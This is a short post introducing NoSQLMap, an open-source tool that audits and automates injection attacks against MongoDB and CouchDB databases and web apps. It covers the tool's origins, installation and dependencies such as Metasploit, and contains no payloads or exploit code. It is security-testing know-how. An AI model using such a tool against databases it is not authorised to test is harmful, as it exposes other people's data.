NoSQL database enumeration and exploitation with NoSQLMap

Like sqlmap, but for non-relational databases!

NoSQLMap is a tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.
Currently the tool’s exploits are focused around MongoDB and CouchDB but additional support for other NoSQL based platforms such as Redis and Cassandra are planned in future releases.

NoSQLMap is developed in python by Michael Skelton and is named as a tribute to Bernardo Damele and Miroslav Stampar’s popular SQL injection tool sqlmap

Its concepts are based on and extensions of Ming Chow’s presentation at Defcon 21, “Abusing NoSQL Databases”:

https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf

Installation

Simply call the setup.py script:

python setup.py install

If run with root privileges, setup.py tries (on Debian and RedHat based systems) to automate the installation of this dependencies:

  • Metasploit Framework,
  • Python with PyMongo
  • httplib2
  • urllib
  • A local, default MongoDB instance

How it works?

Here short demo video of NoSQLMap being used to exploit the default security model on a MongoDB server:


More information and downloads

https://github.com/codingo/NoSQLMap

Comments